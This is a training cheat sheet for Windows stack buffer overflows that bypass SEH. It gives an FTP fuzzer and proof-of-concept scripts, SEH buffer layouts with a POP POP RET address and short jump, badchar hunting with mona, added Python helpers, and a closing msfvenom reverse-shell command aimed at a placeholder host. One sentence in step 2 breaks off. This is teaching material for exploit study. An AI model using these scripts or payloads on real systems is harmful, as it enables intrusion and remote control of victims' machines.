GETTING STARTED
Introduction
This is a quick reference for getting started with buffer overflows.
- Buffer Overflow Training (learn from scratch how to create your own exploit exploring buffer overflows on Windows)
- LinkedIn page (Eder Luis - 0xffff)
- PDF version coming soon (https://sec4us.com.br)
Immunity Debugger
Install Immunity
Download it after filling in the form: https://debugger.immunityinc.com/ID_register.py
Configure mona.py in Immunity Debugger
Download https://raw.githubusercontent.com/corelan/mona/master/mona.py
Put mona.py inside the PyCommands directory of the Immunity Debugger installation.
Set a logs directory inside Immunity Debugger
!mona config -set workingfolder c:\logs\%p
- It is important that the logs directory already exists on the Windows machine running Immunity; mona replaces %p with the name of the debugged process.
REGISTERS
What are registers?
A register is a small storage location inside the CPU used to hold data and addresses while instructions execute.
Registers - 32 bits

32 bits | 16 bits | 8 bits (high) | 8 bits (low)
---|---|---|---
eax | ax | ah | al
ecx | cx | ch | cl
edx | dx | dh | dl
ebx | bx | bh | bl
esp | sp | | spl
ebp | bp | | bpl
esi | si | | sil
edi | di | | dil
IP - Instruction Pointer
Points to the next instruction to be executed.

Register | Description
---|---
ip | 16 bits
eip | 32 bits
rip | 64 bits
SP - Stack Pointer
Points to the top of the stack.

Register | Description
---|---
sp | 16 bits
esp | 32 bits
rsp | 64 bits
PROOF OF CONCEPT (POC)
FTP connection POC example [poc-test.py]

```python
#!/usr/bin/python
# Python 2: str is a byte string, so it can be sent on the socket directly.
import sys
import socket
import time
from struct import *

rhost = 'x.x.x.x'
port = 21
buffer = "A" * 100
buffer += '\r\n'

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((rhost, port))
    print s.recv(2048)
    s.send('USER 0xffff\r\n')
    print s.recv(2048)
    s.send('PASS eder@sec4us\r\n')
    print s.recv(2048)
    # the oversized buffer goes in the STOR argument
    s.send('STOR ' + buffer)
    print s.recv(2048)
    s.close()
    print "Sent Buffer of %s bytes" % len(buffer)
except socket.error as error:
    s.close()
    print error
```
Simple FTP connection POC fuzzer [fuzzer.py]

```python
#!/usr/bin/python
import sys
import socket, time

remoteip = "x.x.x.x"
port = 21
size = 100
buffer = "A" * size

# Grow the STOR argument by 100 bytes per round; when the connection
# fails, the service crashed on the previous size.
while True:
    print "Fuzzing with %s bytes" % len(buffer)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.connect((remoteip, port))
    except socket.error:
        print "[-] Connection error!"
        sys.exit(1)
    print s.recv(1024)
    print "Sending username..."
    s.send('USER anonymous\r\n')
    print s.recv(1024)
    print "Sending pass..."
    s.send('PASS 0xffff@sec4us.com.br\r\n')
    print s.recv(1024)
    s.send('STOR ' + buffer + '\r\n')
    print s.recv(2048)
    s.close()
    time.sleep(1)
    size += 100
    buffer = "A" * size
    print "-------------------------"
```
BADCHARS
ASCII Table

CHAR | DEC | OCT | HEX | Linux
---|---|---|---|---
(nl) | 10 | 0012 | x0a | \n
(cr) | 13 | 0015 | x0d | \r
A | 65 | 0101 | x41 |
B | 66 | 0102 | x42 |
C | 67 | 0103 | x43 |
Common badchars
Looking at the ASCII table, there are three bytes that are almost always bad characters for applications:
\x00 = null byte, the end of a C string
\x0a = new line, \n (Linux)
\x0d = carriage return, \r (Linux)
STRUCT EXCEPTION HANDLING (SEH)
1 - What are exception handlers?
An exception handler is a piece of code written inside an application whose purpose is to deal with the exceptions the application throws, so that the application can protect itself.

```cpp
try
{
    // run stuff. If an exception occurs, go to the catch block
}
catch
{
    // run stuff when an exception occurs
}
```

2 - SEH structure
This structure (also called a SEH record) is 8 bytes long and has two 4-byte elements: a pointer to the next SEH record and a pointer to the exception handler.
[Image: SEH record layout. Source: corelan.be]
BUFFER OVERFLOW BYPASS SEH - STEP BY STEP
1 - Run the fuzzer
Run the fuzzer to discover at how many bytes the buffer overflow happens.
./fuzzer.py
2 - Run the POC
Run the POC to be sure you got a buffer overflow on the stack, but because of the exception we have to
./poc-test.py
3 - Create a pattern
Create a pattern with the number of bytes discovered by the fuzzer:
msf-pattern_create -l xxx
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag
4 - Discover the SEH position in the stack
Insert the pattern into the POC, run it, and read in Immunity Debugger the value that landed in the SEH handler (the SEH address). Shift+F9 passes the exception on to the application; findmsp then locates the pattern in memory:
shift+F9
!mona findmsp
Example output:
- Exact match at SEH offset 1037
Example:
offset = "A" * yyy
offset = "A" * 1037
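As an added example (not from the cheat sheet, Metasploit or mona), here is a Python 3 re-implementation of what steps 3 and 4 do: it builds the same cyclic pattern as msf-pattern_create and, given the 4 bytes that landed in the SEH handler, recovers the offset that !mona findmsp reports. The 0x36694235 value in the demo is constructed from the pattern itself, not taken from a real crash.

```python
from itertools import product
from string import ascii_uppercase, ascii_lowercase, digits
import struct


def pattern_create(length):
    """Metasploit-style cyclic pattern Aa0Aa1...Az9Ba0..., truncated to `length`."""
    out = []
    for a, b, c in product(ascii_uppercase, ascii_lowercase, digits):
        out.append(a + b + c)
        if len(out) * 3 >= length:
            break
    return "".join(out)[:length]


def pattern_offset(pattern, needle):
    """Offset of `needle` in `pattern`, or -1 if it is not part of the pattern.

    `needle` is either the 4 characters seen in memory, or the 32-bit value the
    debugger shows in the SEH handler field. That value is stored little-endian,
    so it is packed back into its memory byte order before searching.
    """
    if isinstance(needle, int):
        try:
            needle = struct.pack("<I", needle).decode("ascii")
        except UnicodeDecodeError:
            return -1
    return pattern.find(needle)


if __name__ == "__main__":
    pat = pattern_create(1500)
    print(pat[:40])
    # constructed example: the handler field read as 0x36694235 ("5Bi6" in memory)
    print(pattern_offset(pat, 0x36694235))   # 1037, the same offset as on the page
```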
5 - Make a stack fitting
Now it is time to build the exploit. In this example we reserve 400 bytes for the payload (the esp variable) behind the SEH record and fit the SEH bypass in front of it.
Example:

```python
# "A" padding up to the SEH record
offset = "A" * yyy
# next SEH record pointer: will hold the short jump over the handler
nseh = "BBBB"
# SEH handler: will hold the POP POP RET address
seh = "CCCC"
# shellcode space
esp = "D" * 400
buffer = offset + nseh + seh + esp
```
6 - Unstacking 8 bytes with POP POP RET
!mona seh -n
- Choose an address from the DLL with the fewest protections. Example: kmdtpcm.dll, address 0x1220401E
7 - Jump over the SEH structure (8 bytes)
After POP POP RET, execution resumes at the nSEH field, so the short jump placed there must skip the 4-byte handler address that follows it (the SEH record is 8 bytes in total).
msf-nasm_shell
nasm> jmp short 08
result: \xeb\x06
8 - New stack fitting

```python
from struct import pack

# offset before the SEH record
offset = "A" * yyy
# nSEH: two NOPs plus jmp short 8 (\xeb\x06), jumping over the handler address
nseh = "\x90\x90\xeb\x06"
# SEH handler: POP POP RET address, little-endian; it returns execution to nSEH
seh = pack('<L', 0x1220401E)
# shellcode space
esp = "D" * 400
buffer = offset + nseh + seh + esp
```
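Added example, not from the cheat sheet: a Python 3 walk-through of the layout built in steps 5 to 8. It encodes the short jump the way msf-nasm_shell does and computes where execution lands once POP POP RET returns into the nSEH field, using the page's offset of 1037 and handler address 0x1220401E.

```python
import struct

# Values from steps 4 to 8 of the page (the handler address is the page's example gadget)
OFFSET = 1037                         # "A" padding before the SEH record
NSEH = b"\x90\x90\xeb\x06"            # next-SEH field: nop, nop, jmp short +6
SEH = struct.pack("<L", 0x1220401E)   # handler field: POP POP RET address, little-endian
PAYLOAD_SPACE = 400                   # the "D" * 400 region


def jmp_short(target):
    """Encode `jmp short target` as msf-nasm_shell does for code assembled at 0:
    the rel8 displacement counts from the end of the 2-byte instruction, so 08 -> EB 06."""
    rel = target - 2
    if not -128 <= rel <= 127:
        raise ValueError("target %d is outside the rel8 range" % target)
    return bytes([0xEB, rel & 0xFF])


def landing_offset(offset, nseh):
    """Buffer offset where execution continues after the nSEH stub: skip the NOPs,
    decode the EB xx jump and apply its signed displacement from the end of the jump."""
    i = 0
    while i < len(nseh) and nseh[i] == 0x90:
        i += 1
    if i + 1 >= len(nseh) or nseh[i] != 0xEB:
        raise ValueError("nSEH does not contain a short jump")
    rel = struct.unpack("<b", nseh[i + 1:i + 2])[0]
    return offset + i + 2 + rel


def describe_layout(offset=OFFSET, nseh=NSEH, seh=SEH, space=PAYLOAD_SPACE):
    """Map the regions of offset + nseh + seh + payload and where the jump lands."""
    layout = {
        "nseh": (offset, offset + 4),
        "seh": (offset + 4, offset + 8),
        "payload": (offset + 8, offset + 8 + space),
        "handler": struct.unpack("<L", seh)[0],
    }
    layout["landing"] = landing_offset(offset, nseh)
    layout["skipped_payload_bytes"] = layout["landing"] - layout["payload"][0]
    return layout


if __name__ == "__main__":
    print(jmp_short(8).hex())        # eb06
    print(describe_layout())         # landing 1047: 2 bytes into the payload region
```

The jump clears the 4-byte handler address plus the first 2 bytes of the payload region, which is why the payload area is normally started with a NOP sled rather than with the first shellcode instruction.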
9 - Looking for badchars
Inside Immunity Debugger, generate the byte array (the second form excludes the bytes already known to be bad):
!mona bytearray
!mona bytearray -cpb "\x00\x0a\x0d"
Put the bytearray in your POC:
```python
bytearray = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22"
"\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42"
"\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62"
"\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82"
"\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2"
"\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2"
"\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2"
"\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
```
Put the bytearray in the POC and run it to get, in Immunity, the address where the bytearray starts on the stack (ZZZZZZZZ). Then, inside Immunity Debugger, compare memory against the file mona wrote:
!mona compare -f c:\logs\appname\bytearray.bin -a ZZZZZZZZ
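Added example, not from the cheat sheet or mona: a Python 3 version of the comparison !mona compare performs in step 9, run against constructed memory dumps rather than a real debugger. It reproduces the -cpb byte array and reports whether the copy in memory is unmodified, truncated or corrupted, and which byte to exclude in the next round.

```python
def build_bytearray(exclude=(0x00, 0x0A, 0x0D)):
    """Same bytes as `!mona bytearray -cpb "\\x00\\x0a\\x0d"`: 0x00-0xff minus the excluded ones."""
    return bytes(b for b in range(256) if b not in exclude)


def compare_bytearray(expected, observed):
    """Mimic the `!mona compare` verdict.

    Returns (status, bad_byte): status is 'unmodified', 'truncated' (the copy
    stops early, as a string terminator would cause) or 'corrupted' (bytes
    differ, as a stripped or translated character would cause). bad_byte is
    the expected byte at the first divergence, i.e. the next badchar candidate.
    """
    n = min(len(expected), len(observed))
    for i in range(n):
        if expected[i] != observed[i]:
            return "corrupted", expected[i]
    if len(observed) < len(expected):
        return "truncated", expected[len(observed)]
    return "unmodified", None


# Constructed samples (not real debugger dumps): one application drops 0x20
# from the input, the other stops copying at the first 0x80.
ARRAY = build_bytearray()
STRIPPED_SPACE = ARRAY.replace(b"\x20", b"")
CUT_AT_0x80 = ARRAY[:ARRAY.index(0x80)]

if __name__ == "__main__":
    print(compare_bytearray(ARRAY, ARRAY))            # ('unmodified', None)
    print(compare_bytearray(ARRAY, STRIPPED_SPACE))   # ('corrupted', 32)
    print(compare_bytearray(ARRAY, CUT_AT_0x80))      # ('truncated', 128)
```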
10 - Build a payload (reverse shell)
Use msfvenom to build the reverse shell payload, excluding the badchars found in step 9 and emitting it as the esp variable:
msfvenom -p windows/shell_reverse_tcp lhost=x.x.x.x lport=xxx -b "\x00\x0a\x0d\x......." -a x86 --platform win -v esp -f python